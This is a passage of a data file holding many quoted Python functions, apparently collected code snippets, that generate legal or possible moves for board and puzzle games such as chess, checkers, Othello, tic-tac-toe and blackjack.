allowed:\n moves.extend(self.get_legal_move_piece(curr_loc, index))\n it.iternext()\n return moves", "def get_goat_possible_moves(self) -> List:\n moves = []\n for pos in self.get_all_positions():\n if pos.is_goat():\n addr_from = pos.address\n for addr_to in pos.piece.get_valid_moves():\n moves.append((addr_from, addr_to))\n\n return moves", "def __update_valid_moves(self):\r\n\r\n\t\tmoves = ['Stay']\r\n\r\n\t\t# case for 21\r\n\t\tfor value in self.values:\r\n\t\t\tif value > 21:\r\n\t\t\t\tself.valid_moves = 'Bust'\r\n\t\t\t\treturn\r\n\t\t\tif value == 21:\r\n\t\t\t\tif len(self.cards) == 2:\r\n\t\t\t\t\tself.valid_moves = 'Blackjack'\r\n\t\t\t\t\treturn\r\n\t\t\t\tself.valid_moves = '21'\r\n\t\t\t\treturn\r\n\t\tmoves.append('Hit')\r\n\r\n\t\tif len(self.cards) <= 2:\r\n\t\t\tmoves.append('Double')\r\n\r\n\t\tif len(self.cards) == 2:\r\n\t\t\tif self.cards[0].rank == self.cards[1].rank:\r\n\t\t\t\tmoves.append('Split')\r\n\r\n\t\tself.valid_moves = moves", "def get_valid_moves(self):\n if self.king:\n valid_moves = [[self.row + 1, self.col + 1],\n [self.row + 1, self.col - 1],\n [self.row - 1, self.col - 1],\n [self.row - 1, self.col + 1]]\n else:\n if self.player == 1:\n valid_moves = [[self.row + 1, self.col + 1],\n [self.row + 1, self.col - 1]]\n else:\n valid_moves = [[self.row - 1, self.col - 1],\n [self.row - 1, self.col + 1]]\n return valid_moves", "def legal_moves(board,player=None):\r\n \r\n possible_moves = []\r\n moves = []\r\n if player == None:\r\n moves += board.white + board.black\r\n elif player == -1:\r\n moves += board.black\r\n elif player == 1:\r\n moves += board.white\r\n \r\n captured = False\r\n for pos in moves:\r\n if pos[0] == 'A':\r\n m = [-8,-7,1,8,9]\r\n elif pos[0] == 'H':\r\n m = [-9,-8,-1,7,8]\r\n else:\r\n m = [-9,-8,-7,-1,1,7,8,9]\r\n loc = decode(pos)\r\n for i in m:\r\n captured = capture(board, player, possible_moves, pos, loc, i)\r\n canter(board, player, possible_moves, pos, loc, i)\r\n plain(board, player, possible_moves, pos, loc, i)\r\n \r\n if captured:\r\n enemy_list = []\r\n for capturing_move in possible_moves:\r\n if len(capturing_move) == 3:\r\n enemy_list.append(capturing_move)\r\n possible_moves = list(enemy_list)\r\n\r\n return possible_moves", "def safe_moves(p, state):\n\n x, y = state['players'][p]['x'], state['players'][p]['y']\n\n moves = []\n actions = [(1, 0, 'east'),\n (-1, 0, 'west'),\n (0, -1, 'north'),\n (0, 1, 'south')]\n for dx, dy, move in actions:\n tx, ty = str(x + dx), str(y + dy)\n if tx not in state['cells'] or ty not in state['cells'][tx]:\n moves.append(move)\n\n return moves", "def parse_moves(moves):\n possible_moves = []\n for move in moves:\n if move == 'W':\n possible_moves.append('UP')\n elif move == 'D':\n possible_moves.append('RIGHT')\n elif move == 'S':\n possible_moves.append('DOWN')\n elif move == 'A':\n possible_moves.append('LEFT')\n return possible_moves", "def getPossibleMoves(self): # called to get possible positions this piece can go\r\n \r\n moves = {}\r\n\r\n ids = []\r\n\r\n for piece in self.board.pieces.values():\r\n if piece.name == \"empty\":\r\n piece.glow = False\r\n piece.ready = False\r\n\r\n self.piece = self\r\n\r\n def check(direction=\"left\", heading=\"north\", x=None, y=None):\r\n piece = self.piece\r\n if direction == \"left\": x -= 50\r\n else: x += 50\r\n\r\n if heading == \"north\": y -= 50\r\n else: y += 50\r\n\r\n if (x, y) in self.board.pieces: # position is empty\r\n empty = self.board.getPiece((x, y))\r\n empty.glow = True\r\n old, new, obj = (direction, heading), (x, y), piece\r\n identity = self.getRandomID(ids) # get an ID for the move\r\n moves[identity] = old, new, obj\r\n\r\n if piece.isKing: # piece is a king, so go on\r\n check(direction, heading, x, y)\r\n else: # its not empty, so check if its comrade\r\n x1, y1 = x+25, y+25\r\n piece2 = self.board.getPiece((x1, y1))\r\n try:\r\n if piece.isComrade(piece2):# piece is comrade so return\r\n return\r\n else: # piece is not comrade, so check empty\r\n if direction == \"left\": x2 = x1-25-50\r\n else: x2 = x1-25+50\r\n\r\n if heading == \"north\": y2 = y1-25-50\r\n else: y2 = y1-25+50\r\n\r\n if (x2, y2) in self.board.pieces: # its empty, so notify player\r\n empty = self.board.getPiece((x2, y2))\r\n empty.glow = True\r\n empty.ready = True\r\n\r\n old, new, obj = (direction, heading), (x2, y2), piece2\r\n identity = self.getRandomID(ids)\r\n moves[identity] = old, new, obj\r\n\r\n check(direction, heading, piece2.x-25, piece2.y-25)\r\n check(direction, heading, x2, y2)\r\n \r\n # check empty or comrade again\r\n if direction == \"left\": x3 = x2-50\r\n else: x3 = x2+50\r\n\r\n if heading == \"north\": y3 = y2-50\r\n else: y3 = y2+50\r\n\r\n if (x3, y3) in self.board.pieces: # positon(address) is empty\r\n return\r\n else: # there is a piece, so check if comrade, stop, if not comrade continue\r\n x3+=25\r\n y3+= 25\r\n\r\n piece3 = self.board.getPiece((x3, y3))\r\n if piece3.isComrade(piece2): # comrades, so stop\r\n return\r\n else: # not comrades, so continue\r\n self.piece = piece3\r\n check(direction, heading, x, y)\r\n\r\n #self.piece = piece2\r\n \r\n #check(direction, heading, x2, y2) # keep searching\r\n else: # its not empty, so return\r\n return\r\n except:\r\n pass\r\n\r\n if self.piece.name == \"white\": direction = \"north\"\r\n else: direction = \"south\"\r\n \r\n check(\"left\", direction, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", direction, self.piece.x-25, self.piece.y-25)\r\n \r\n if self.piece.isKing:\r\n if self.piece.name == \"white\": heading = \"south\"\r\n else: heading = \"north\"\r\n \r\n check(\"left\", heading, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", heading, self.piece.x-25, self.piece.y-25)\r\n\r\n if self.piece.name == \"white\":\r\n eatMoves = self.board.game.thinkEatMoves(moves, \"person\")\r\n if eatMoves is not None:\r\n return eatMoves\r\n\r\n return moves", "def findPlacesToMove():\n movesDestinations = [];\n \n curY = curBlank[0];\n curX = curBlank[1];\n\n if(curY-1 >= 1): #UP\n movesDestinations.append((curY-1, curX));\n if(curY+1 <= n): #DOWN\n movesDestinations.append((curY+1, curX));\n if(curX-1 >= 1): #LEFT\n movesDestinations.append((curY, curX-1));\n if(curX+1 <= n): #RIGHT\n movesDestinations.append((curY, curX+1));\n \n return movesDestinations;", "def show_moves(self):\n return self.game_manager.send_adversary_moves(self)", "def get_valid_moves(self):\r\n # castling and en-passant rights are stored, because move affects these values\r\n temp_enpassant_possible = self.enpas_pos\r\n temp_castle = CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs)\r\n\r\n # for validating a possible move\r\n #1 all possibile moves are generated\r\n #2 each pos moves are made\r\n #3 generate opponent move\r\n #4 check if any of those moves let the king attacked\r\n #5 moves which let the king in chess are eliminated\r\n #6 the moves are undone\r\n moves = self.get_all_possible_moves() # 1\r\n\r\n # castle moves are directly introduced in valid moves\r\n if not self.turn_white:\r\n self.get_castle_moves(self.bKingPos[0], self.bKingPos[1], moves)\r\n else:\r\n self.get_castle_moves(self.wKingPos[0], self.wKingPos[1], moves)\r\n\r\n for i in range(len(moves) - 1, -1, -1): # 2\r\n self.make_move(moves[i])\r\n # 3 #4\r\n self.turn_white = not self.turn_white\r\n if self.in_check():\r\n moves.remove(moves[i]) # 5\r\n self.turn_white = not self.turn_white\r\n self.undo_move()\r\n\r\n # game ending possibilities\r\n if len(moves) == 0:\r\n if self.in_check():\r\n self.checkMate = True\r\n print(\"Checkmate !\")\r\n else:\r\n self.staleMate = True\r\n print(\"Stalemate !\")\r\n else:\r\n self.checkMate = False\r\n self.staleMate = False\r\n\r\n # the rigths are restored, and the values are not affected\r\n self.enpas_pos = temp_enpassant_possible\r\n self.cr_castle_r = temp_castle\r\n\r\n return moves", "def get_all_moves(self):\n # 2d matrix of true/false, true if something can be placed\n legal_move_board = []\n possible_move_list = []\n for row in range(self.size):\n move_row = []\n for col in range(self.size):\n empty = self.board[row][col].state == PegState.EMPTY\n move_row.append(empty)\n if empty:\n possible_move_list.append((row, col))\n legal_move_board.append(move_row)\n \n # every position where something can be placed (list of tuples) (Combined with above)\n \"\"\" possible_move_list = []\n for row in range(self.size):\n for col in range(self.size):\n if legal_move_board[row][col] == True:\n possible_move_list.append((row, col))\n \"\"\"\n return legal_move_board, possible_move_list", "def canter(board,player,possible_moves, pos, loc, i):\r\n \r\n next_piece = encode(loc+i) \r\n new_pos = loc + (i*2)\r\n \r\n if player == 1 and next_piece in board.white:\r\n if not((pos[0] == 'B') and ((next_piece)[0] == 'A')) and not((pos[0] == 'G') and ((next_piece)[0] == 'H')):\r\n new_enc = encode(new_pos)\r\n if new_pos in range(0,112) and (new_enc not in board.white) and (new_enc not in board.black) and (new_enc not in board.empty):\r\n possible_moves.append([pos,new_enc])\r\n if player == -1 and next_piece in board.black:\r\n if not((pos[0] == 'B') and ((next_piece)[0] == 'A')) and not((pos[0] == 'G') and ((next_piece)[0] == 'H')):\r\n new_enc = encode(new_pos)\r\n if new_pos in range(0,112) and (new_enc not in board.white) and (new_enc not in board.black) and (new_enc not in board.empty):\r\n possible_moves.append([pos,new_enc])", "def get_available_moves(self, board):\n pass", "def get_all_game_pieces_potential_moves(self):\n\n board = self.get_board()\n\n for row in board:\n\n for column in row:\n\n if column is not None:\n\n print(column.get_label(), ': ' , column.get_potential_moves())", "def random_moves(length):\n ans = \"\"\n for dummy_num in range(length):\n ans += random.choice([\"u\",\"d\",\"l\",\"r\"])\n return ans", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def _get_piece_moves(self, x, y):\n\n piece = self.get_piece(x, y)\n moves = []\n\n if not piece:\n return moves\n\n if piece.name == 'rook' or piece.name == 'queen':\n direcs = ['up', 'down', 'left', 'right']\n moves = [self._get_moves_indirection(x, y, direc) for direc in\n direcs]\n\n elif piece.name == 'bishop' or piece.name == 'queen':\n direcs = ['d1', 'd2', 'd3', 'd4']\n for direc in direcs:\n moves += self._get_moves_indirection(x, y, direc)\n\n elif piece.name == 'king':\n moves = [(x-1, y-1), (x-1, y), (x-1, y+1), (x, y-1),\n (x, y+1), (x+1, y-1), (x+1, y), (x+1, y+1)]\n\n elif piece.name == 'knight':\n moves = [(x-1, y-2), (x-2, y-1), (x-2, y+1), (x-1, y+2),\n (x+1, y+2), (x+2, y+1), (x+1, y-2), (x+2, y-1)]\n\n elif piece.name == 'pawn':\n if piece.color == ChessGame.BLACK:\n moves = [(x-1, y), (x-1, y-1), (x-1, y+1)]\n else:\n moves = [(x+1, y), (x+1, y-1), (x+1, y+1)]\n\n tmp = list(moves)\n for u, v in tmp:\n if v != y and not self.is_enemy(u, v, piece.color):\n moves.remove((u, v))\n\n if v == y and self.is_enemy(u, v, piece.color):\n moves.remove((u, v))\n\n mycolor = piece.color\n valid = set()\n for (u, v) in moves:\n if not self.in_bounds(u, v):\n continue\n\n if not self.get_piece(u, v): # board is blank\n valid.add((u, v))\n\n if self.is_enemy(u, v, mycolor):\n valid.add((u, v))\n\n return valid", "def get_legal_moves(self):\n\n return self._legal_moves", "def get_all_possible_moves(self):\r\n moves = []\r\n for i in range(8):\r\n for j in range(8):\r\n color = self.board[i][j][0]\r\n if (color == 'b' and not self.turn_white) or (color == 'w' and self.turn_white):\r\n p_type = self.board[i][j][1]\r\n if p_type == 'r':\r\n self.get_rook_moves(i, j, moves)\r\n elif p_type == 'k':\r\n self.get_king_moves(i, j, moves)\r\n elif p_type == 'q':\r\n self.get_queen_moves(i, j, moves)\r\n elif p_type == 'p':\r\n self.get_pawn_moves(i, j, moves)\r\n elif p_type == 'b':\r\n self.get_bishop_moves(i, j, moves)\r\n elif p_type == 'n':\r\n self.get_knight_moves(i, j, moves)\r\n return moves", "def get_legal_moves(self):\n moves = []\n if self.player_locations[self.whose_turn] is None:\n return self.get_blank_locations()\n matrix = [(1,0), (-1,0), (0,1), (0,-1), (1,1), (1,-1), (-1, 1), (-1,-1)]\n\n for dx, dy in matrix:\n x,y = self.player_locations[self.whose_turn]\n while x+dx <= xdim and x+dx >= 0 and y+dy <= ydim and y+dy >= 0:\n x = x+dx\n y = y+dx\n if self.board[x][y] : break\n moves.append((x,y))\n return moves", "def get_possible_moves(board):\n\tpossible_moves = []\n\n\tfor count, player in enumerate(board):\n\t\tif player is not server_player and player is not user_player:\n\t\t\tpossible_moves.append(count)\n\n\treturn possible_moves", "def legal_moves_in_uci(self):\n\n # get all legal moves. 'legal_moves' is inherited attribute from super class that returns all possible moves\n return [m.uci() for m in list(self.legal_moves)]", "def random_move(board):\n\tpossible_moves = []\n\tboard_copy = list(board)\n\n\tfor count, player in enumerate(board):\n\t\tif player == ' ':\n\t\t\tpossible_moves.append(count)\n\n\tif len(possible_moves) != 0:\n\t\tmove = random.choice(possible_moves)\n\t\tboard_copy[move] = 'o'\n\n\t\treturn ''.join(board_copy)\n\t\n\telse:\n\t\treturn board", "def get_next_moves1(self):\n moves = []\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n if self.board[i][j] == \"\":\n next_board = copy.deepcopy(self.board)\n next_board[i][j] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n next_turn = get_opponent(self.turn)\n moves.append(DotsAndBoxesState(next_board, next_turn))\n return moves", "def actions(board):\r\n if terminal(board):\r\n return \"X\"\r\n poss = []\r\n for row in range(len(board)):\r\n for col in range(len(board[row])):\r\n if not board[row][col] == \"X\" and not board[row][col] == \"O\":\r\n poss.append((row, col))\r\n \r\n return list(set(poss))\r\n\r\n raise NotImplementedError", "def get_legal_moves(self, i, j):\r\n legal_moves = list()\r\n for action in self.action_dic.keys():\r\n coordinate_change = self.action_dic[action]\r\n new_i = coordinate_change[0] + i\r\n new_j = coordinate_change[1] + j\r\n if (new_i >= 0 and new_i < 3) and (new_j >= 0 and new_j < 3):\r\n legal_moves.append(self.reflection_dic[action])\r\n return legal_moves", "def possible_moves_list(row, col):\r\n top = (row - 1, col)\r\n bot = (row + 1, col)\r\n left = (row, col - 1)\r\n right = (row, col + 1)\r\n diagonal_top_left = (row - 1, col - 1)\r\n diagonal_top_right = (row - 1, col + 1)\r\n diagonal_bot_left = (row + 1, col - 1)\r\n diagonal_bot_right = (row + 1, col + 1)\r\n moves = [top, bot, left, right, diagonal_top_left, diagonal_top_right, diagonal_bot_left, diagonal_bot_right]\r\n return moves", "def validpositions(tile):\n if tile == 11 or tile == 21:\n valid_pos = \"n\"\n elif tile == 12:\n valid_pos = \"nes\"\n elif tile == 13:\n valid_pos = \"es\"\n elif tile == 22 or tile == 33:\n valid_pos = \"sw\"\n elif tile == 23:\n valid_pos = \"ew\"\n elif tile == 32:\n valid_pos = \"ns\"\n possible_directions(valid_pos)\n return valid_pos", "def get_instructions(self):\n return \"A non-negative whole number is chosen as the starting \\n\" \\\n \"valueby some neutral entity. In our case, a player will \\n\" \\\n \"choose it (i.e. through the use of input. The player whose \\n\" \\\n \"turn it is chooses some square of a positive whole number (\\n\" \\\n \"such as 1, 4, 9, 16, . . . ) to subtract from the \\n\" \\\n \"value, provided the chosen square is not larger. After \\n\" \\\n \"subtracting, we have a new value and the next player \\n\" \\\n \"chooses a square to ubtract from it. Play continues\\n\" \\\n \" to alternate between the two players until no moves are\\n\" \\\n \" possible. Whoever is about to play at that point loses!\"", "def get_move(moves):\n pass", "def available_moves(self):\n available_moves = []\n for i in range(self.quadrants_count):\n quadrant_positions = self.play_area[i].available_positions()\n for p in quadrant_positions:\n position = p + i * 9\n for j in range(self.quadrants_count):\n move1 = [str(position), str(j + 1), \"l\"]\n move2 = [str(position), str(j + 1), \"r\"]\n available_moves.append(\" \".join(move1))\n available_moves.append(\" \".join(move2))\n return available_moves", "def get_possible_moves(self):\n moves = []\n for i in range(1, self.current_total + 1):\n if i ** 2 <= self.current_total:\n moves.append(i ** 2)\n\n return moves", "def openMoves(self):\n arr = []\n for y in range(0,HEIGHT):\n for x in range(0,WIDTH):\n t = self.getPawn(x,y)\n if(t!=None):\n for z in range(-1,2):\n if(self.legalMove(t,z)):\n #move , #newState\n arr.append((t,z))\n return arr", "def valid_moves(board):\n return [i for i, x in enumerate(board) if x == ' ']", "def render_possible_moves(self):\n for move in self.env.possible_moves(self.env.turn):\n self.render_marker(move, Colors.BLUE)", "def test_find_knight_next_moves_limit_of_board(self):\n result = _find_knight_next_moves('h1')\n self.assertEqual(['f2', 'g3'], result)", "def possible_directions(valid_positions):\n if valid_positions == \"n\":\n print(\"You can travel: (N)orth.\")\n elif valid_positions == \"nes\":\n print(\"You can travel: (N)orth or (E)ast or (S)outh.\")\n elif valid_positions == \"es\":\n print(\"You can travel: (E)ast or (S)outh.\")\n elif valid_positions == \"sw\":\n print(\"You can travel: (S)outh or (W)est.\")\n elif valid_positions == \"ew\":\n print(\"You can travel: (E)ast or (W)est.\")\n elif valid_positions == \"ns\":\n print(\"You can travel: (N)orth or (S)outh.\")", "def print_game_state(board):\r\n print(board)\r\n illegal_moves = [(0, 0), (2, 0), (0, 4), (2, 4)]\r\n for i in range(board.shape[0]):\r\n buffer = ''\r\n for j in range(board.shape[1]):\r\n if board[i][j] == 1:\r\n buffer += 'X\\t'\r\n elif board[i][j] == 2:\r\n buffer += '0\\t'\r\n elif (i, j) in illegal_moves:\r\n buffer += ' \\t'\r\n else:\r\n buffer += '-\\t'\r\n print (buffer)", "def __str__(self):\n board = \"\"\" 0 1 2 3 4 5\\n\"\"\"\n\n for y in range(Board.board_size):\n board += str(y) + \" \"\n for x in range(Board.board_size):\n piece = self.board[x][y] if self.board[x][y] is not None else \".\"\n\n piece = str(piece).lower() if piece in self.player_1_pieces else str(piece)\n\n board += piece\n board += \" \"\n board += \"\\n\"\n return board", "def _get_possible_moves(board, lightcycle):\n result = []\n for diff in ((0, 1, PlayerActions.MOVE_DOWN), (1, 0, PlayerActions.MOVE_RIGHT), (0, -1, PlayerActions.MOVE_UP), (-1, 0, PlayerActions.MOVE_LEFT)):\n next_x = lightcycle['position'][0] + diff[0]\n next_y = lightcycle['position'][1] + diff[1]\n if 0 <= next_x < len(board) and 0 <= next_y < len(board[0]):\n if board[next_x][next_y] in (EMPTY, POWERUP):\n result += [diff]\n return result", "def legalMoves( self, row, col):\n moves = []\n if(row != 0 and self.board[row - 1][col] == 0):\n moves.append(0)\n if(col != self.n - 1 and self.board[row][col + 1] == 0):\n moves.append(2)\n if(row != self.n - 1 and self.board[row + 1][col] == 0):\n moves.append(4)\n if(col != 0 and self.board[row][col - 1] == 0):\n moves.append(6)\n \n if (row + col) % 2 == 0: # can follow the cross\n if (row != 0 and col != 0 and self.board[row - 1][col - 1] == 0):\n moves.append(7)\n if (row != 0 and col != self.n - 1 and self.board[row - 1][col + 1] == 0):\n moves.append(1)\n if (row != self.n - 1 and col != self.n - 1 and self.board[row + 1][col + 1] == 0):\n moves.append(3)\n if (row != self.n - 1 and col != 0 and self.board[row + 1][col - 1] == 0):\n moves.append(5)\n\n return moves", "def print_moves(self):\n print self._current_moves\n self._current_moves = \"\"", "def command_moves(board, locations):\n possible_moves = []\n buffers = [(1,0), (0,1), (-1,0), (0,-1)]\n\n for piece in locations:\n piece_moves = []\n\n for move in buffers:\n\n poss_move = return_valid_move(board, locations, piece, move)\n\n if poss_move:\n piece_moves.append(poss_move)\n\n possible_moves.append(piece_moves)\n\n return possible_moves", "def _annotate_moves(moves, ladders, snakes):\n solution = [{\"src\": moves[i], \"dst\": moves[i + 1]} for i in xrange(len(moves) - 1)]\n\n for move in solution:\n move[\"step\"] = move[\"dst\"] - move[\"src\"]\n if move[\"src\"] in get_src(ladders):\n move[\"action\"] = \"Climbs ladder\"\n elif move[\"src\"] in get_src(snakes):\n move[\"action\"] = \"Is digested by snake\"\n else:\n move[\"action\"] = \"Rolls dice\"\n\n return solution", "def get_legal_moves(self, player: int) -> np.ndarray:\n stage2 = self.is_stage2()\n action_mask = np.zeros((24, 5, 25), dtype=bool)\n # if stage 1 add set options\n array_board = np.array(self.board)\n if not stage2:\n legal_pos = np.where(array_board == 0)[0]\n for pos in legal_pos:\n if self.is_mill(player, pos, self.board): # current selection completes a mill\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if\n not self.is_mill(-player, opp_p, self.board)] # can't remove opponent in mill\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[pos, -1, opp_pos] = True\n else:\n action_mask[pos, -1, -1] = True # place piece on board\n else:\n from_pos_cands = np.where(array_board == player)[0]\n for from_pos in from_pos_cands:\n mill_cands = [(orient, adj) for orient, adj in enumerate(self.adjacent[from_pos]) if\n adj is not None and self.board[adj] == 0] # TODO added not, need to validate\n if_played_board = self.board.copy()\n if_played_board[from_pos] = 0\n for (orient, adj) in mill_cands:\n if self.is_mill(player, adj, if_played_board):\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if not self.is_mill(-player, opp_p, if_played_board)]\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[from_pos, orient, opp_pos] = True\n else:\n action_mask[from_pos, orient, -1] = True\n\n return action_mask", "def get_king_moves(self, i, j, moves):\r\n directions = ((1, 1), (1, -1), (1, 0), (0, -1), (0, 1), (-1, -1), (-1, 1), (-1, 0))\r\n if self.turn_white:\r\n oponent = 'b'\r\n else:\r\n oponent = 'w'\r\n for d in directions:\r\n cri = i + d[0]\r\n crj = j + d[1]\r\n if 0 <= cri <= 7 and 0 <= crj <= 7:\r\n # empty\r\n if self.board[cri][crj][0] == '-':\r\n moves.append(Move((i, j), (cri, crj), self.board))\r\n\r\n # oponent\r\n elif self.board[cri][crj][0] == oponent:\r\n moves.append(Move((i, j), (cri, crj), self.board))", "def legal_moves(player, board):\n return [sq for sq in Othello.squares() if Othello.is_legal(sq, player, board)]", "def __find_all_moves(self, tower) -> list:\r\n choice = []\r\n for height in range(1,len(tower.tower)-2):\r\n for index in range(1,4):\r\n if self.stat_brain.is_valid(height, index, tower):\r\n choice.append((height, index))\r\n \r\n r.shuffle(choice)\r\n return choice", "def get_possibles_moves(board: numpy.ndarray) -> List[Move]:\n return [tuple(k) for k in numpy.argwhere(board == -1) if 0 != k[0] != board.shape[0] - 1 != k[1] != 0]", "def chess_coord_moves(self, select):\n hold = []\n \n for i in self.board[select].possible_moves:\n hold.append(self.chess_coords[self.coords.index(i)])\n \n self.print_message((\"my possible moves are:\",hold))", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def get_all_moves(self, board, player):\n result = []\n for startx in range(8):\n for starty in range(8):\n for destx in range(8):\n for desty in range(8):\n if self.is_legal_move(board, [startx, starty], [destx, desty], player):\n result.append([[startx, starty], [destx, desty]])\n return result", "def choose_move(self, possible_moves, seconds_left):\n # TODO: update this method\n print('\\--------------Choose Move--------------/')\n print(possible_moves)\n print(list(self.current_board.legal_moves))\n search_tree = MCTS(5, self.color, self.current_board)\n search_tree.search()\n move = search_tree.pick_move()['move']\n\n return move", "def get_all_moves(self, castling_allowed=True):\n\n can_move = str.isupper if self.white_to_move else str.islower\n\n valid_moves = set()\n\n for row_num, row in enumerate(self.board):\n for col_num, piece in enumerate(row):\n if piece != EMPTY_SPACE and can_move(piece):\n\n location = (row_num, col_num)\n\n # Everything except the pawn movement\n if piece.lower() in NAME_TO_PIECE:\n valid_moves = valid_moves.union(self._get_standard_moves_for_piece(location, piece))\n\n # Pawn moves\n if piece.lower() == PAWN:\n valid_moves = valid_moves.union(self._get_pawn_moves(location, piece))\n\n # Castling\n if castling_allowed and piece.lower() == KING:\n valid_moves = valid_moves.union(self._get_possible_castles(piece))\n\n return valid_moves", "def findActions(problem, state):\r\n size = len(problem) - 1\r\n legalActions = []\r\n if state[0] > 0 and problem[state[0] - 1][state[1]] != 'w':\r\n legalActions.append('N')\r\n if state[0] < size and problem[state[0] + 1][state[1]] != 'w':\r\n legalActions.append('S')\r\n if state[1] > 0 and problem[state[0]][state[1] - 1] != 'w':\r\n legalActions.append('W')\r\n if state[1] < size and problem[state[0]][state[1] + 1] != 'w':\r\n legalActions.append('E')\r\n return legalActions", "def possible_moves(self):\n lst_of_direcs = []\n for a_car in self.__cars:\n good_moves = a_car.possible_moves()\n new = [(a_car.get_name(),dire, des) for dire, des\\\n in good_moves.items()]\n lst_of_direcs.append(new[0])\n lst_of_direcs.append(new[1])\n return lst_of_direcs", "def actions(board):\n avail_moves = set()\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == EMPTY:\n avail_moves.add((i,j))\n \n if len(avail_moves) == 0:\n return 0\n\n return avail_moves", "def legal_moves(self, player, board):\r\n #go through the whole board and check whether the piece is on the board or not\r\n #num/row size - num%col == num2/row size - num@%col\r\n #num/row size + num%col\r\n moves = list()\r\n opp = self.opponent(player)\r\n #print(board)\r\n for i in self.squares():\r\n if board[i] == core.EMPTY:\r\n for d in core.DIRECTIONS:\r\n endPt = self.find_bracket(i, player, board, d)\r\n if endPt!= None:\r\n moves.append(i)\r\n break\r\n\r\n return moves", "def possible_moves(state_int):\n assert isinstance(state_int, int)\n field = decode_binary(state_int)\n return [idx for idx, col in enumerate(field) if len(col) < GAME_ROWS]", "def get_pgn_moves(self, colour=None):\n if colour is None:\n colour = self.active_colour\n\n destintation_dict = defaultdict(tuple)\n ret = dict()\n\n ## Build a destination dict to check for ambiguous moves.\n\n\n\n for new_position in self.get_moves(colour):\n coord_to = new_position.last_move.coord_to\n piece = type(self[new_position.last_move.coord_from])\n\n\n destintation_dict[(coord_to, piece)] += (new_position,)\n \n for coord_to, piece in list(destintation_dict.keys()):\n # Check for ambigious moves\n if len(destintation_dict[coord_to, piece]) == 1:\n ambiguity = 'NONE'\n else:\n ranks = [position.last_move.coord_from[1] for position in destintation_dict[(coord_to, piece)]]\n files = [position.last_move.coord_from[0] for position in destintation_dict[(coord_to, piece)]]\n if len(ranks) == len(set(ranks)):\n ambiguity = 'RANK'\n elif len(files) == len(set(files)):\n ambiguity = 'FILE'\n else:\n ambiguity = 'BOTH'\n\n # Loop through moves and print notation for moves\n for position in destintation_dict[coord_to, piece]:\n notation = self.get_notation_for_move(position, colour, ambiguity=ambiguity)\n ret[notation] = position\n\n return ret", "def programs_dance(moves, programs):\n\n for move in moves:\n if move[0] == \"s\":\n x = int(move[1:])\n programs = programs[-x:] + programs[:-x]\n if move[0] == \"x\":\n A, B = move[1:].split(\"/\")\n A, B = int(A), int(B)\n programs[A], programs[B] = programs[B], programs[A]\n if move[0] == \"p\":\n A, B = move[1:].split(\"/\")\n A, B = programs.index(A), programs.index(B)\n programs[A], programs[B] = programs[B], programs[A]\n\n return \"\".join(programs)", "def liste_coups_possibles(self): # etape 1\n\n # On récupère toutes les cases vides\n coord_none = [(i, j) for i in range(self.game.goban.taille) for j in range(self.game.goban.taille) if self.game.goban.cell[i][j] == None]\n\n possible_moves = []\n\n for (i, j) in coord_none:\n try:\n if self.game.goban.test_move(i, j, self) == False:\n possible_moves.append((i, j))\n except:\n pass\n\n return possible_moves", "def get_moves(self):\n return self.piece_behavior.get_moves(self.board, self.position)", "def get_possible_actions(self, state):\n return [LEFT, DOWN, RIGHT, UP]", "def actions(self, state):\r\n\r\n valid_actions = []\r\n # What kind of an action it will be\r\n # 1. Add a new piece to the game.\r\n # 2. Move and existing piece.\r\n new_piece, player = self.new_or_old_piece(state)\r\n\r\n # If we want to place a new piece in the game\r\n if new_piece:\r\n for i in range(3):\r\n for j in range(3):\r\n if state[i][j] == '-':\r\n # (player, to, from)\r\n # Since we are introducing a new piece it's coming from\r\n # an imaginary position i.e. (9, 9)\r\n valid_actions.append((player, (i, j), (9, 9)))\r\n\r\n # when we moving an existing piece in the game\r\n else:\r\n for i in range(3):\r\n for j in range(3):\r\n if state[i][j] != '-':\r\n # Now check for places this player can move from this position\r\n for ii, jj in self.valid_adjacent_positions[(i, j)]:\r\n if state[ii][jj] == '-':\r\n # (player, to, from)\r\n valid_actions.append((state[i][j], (ii, jj), (i, j)))\r\n\r\n return 